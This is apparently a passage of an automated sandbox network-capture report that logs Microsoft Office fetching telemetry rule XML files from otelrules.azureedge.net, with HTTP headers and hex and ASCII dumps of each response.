                                                                                                                                            Content-Length: 1362
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                            ETag: "0x8DC582BDF497570"
                                                                                                                                            x-ms-request-id: 7b68ac53-d01e-0082-7e67-27e489000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161321Z-16849878b78bjkl8dpep89pbgg00000008bg00000000vap4
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:21 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            127192.168.2.44988413.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:21 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:21 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:21 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1366
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                            ETag: "0x8DC582BEA414B16"
                                                                                                                                            x-ms-request-id: 68df6217-401e-0029-6d9c-279b43000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161321Z-16849878b78z2wx67pvzz63kdg000000087g00000000yy1d
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:21 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            128192.168.2.44988513.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:21 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:21 UTC584INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:21 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1399
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                            ETag: "0x8DC582BE1CC18CD"
                                                                                                                                            x-ms-request-id: 07be293a-201e-00aa-396b-2b3928000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161321Z-17c5cb586f6wnfhvhw6gvetfh4000000099000000000b2fh
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:21 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            129192.168.2.44988813.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:21 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:22 UTC584INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:22 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1366
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                            ETag: "0x8DC582BE5B7B174"
                                                                                                                                            x-ms-request-id: cf3e7330-401e-0078-5ca6-264d34000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161322Z-16849878b78p49s6zkwt11bbkn00000009gg0000000021w3
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:22 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            130192.168.2.44988713.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:21 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:22 UTC518INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:22 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1403
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                            ETag: "0x8DC582BEB866CDB"
                                                                                                                                            x-ms-request-id: e3dc41a2-201e-003f-25af-2b6d94000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161322Z-159b85dff8fc5h75hC1DFWntr800000001cg000000001m3q
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_MISS
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:22 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            131192.168.2.44988613.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:22 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:22 UTC584INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:22 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1362
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                            ETag: "0x8DC582BEB256F43"
                                                                                                                                            x-ms-request-id: 4113dc96-c01e-008e-5a2a-277381000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161322Z-16849878b78km6fmmkbenhx76n000000090g00000000snm6
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:22 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            132192.168.2.44988913.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:22 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:22 UTC517INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:22 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1399
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                            ETag: "0x8DC582BE976026E"
                                                                                                                                            x-ms-request-id: 36338d89-501e-0064-6fcd-2a1f54000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161322Z-159b85dff8fbvrz4hC1DFW730c00000000w000000000amr8
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:22 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            133192.168.2.44989013.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:22 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:22 UTC517INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:22 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1362
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                            ETag: "0x8DC582BDC13EFEF"
                                                                                                                                            x-ms-request-id: 4b09b00a-d01e-0028-11e9-297896000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161322Z-159b85dff8f5bl2qhC1DFWs6cn00000001w0000000001526
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:22 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            134192.168.2.44989113.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:22 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:22 UTC584INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:22 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1425
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                            ETag: "0x8DC582BE6BD89A1"
                                                                                                                                            x-ms-request-id: 3dc364f2-b01e-0053-5310-2bcdf8000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161322Z-15b8d89586fhl2qtatrz3vfkf00000000g2g00000000arkb
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:22 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            135192.168.2.44989213.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:22 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:23 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:22 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1388
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                            ETag: "0x8DC582BDBD9126E"
                                                                                                                                            x-ms-request-id: 35f8d799-001e-0079-2cb8-2a12e8000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161322Z-17c5cb586f6p5pndayxh2uxv5400000001a000000000hys5
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:23 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
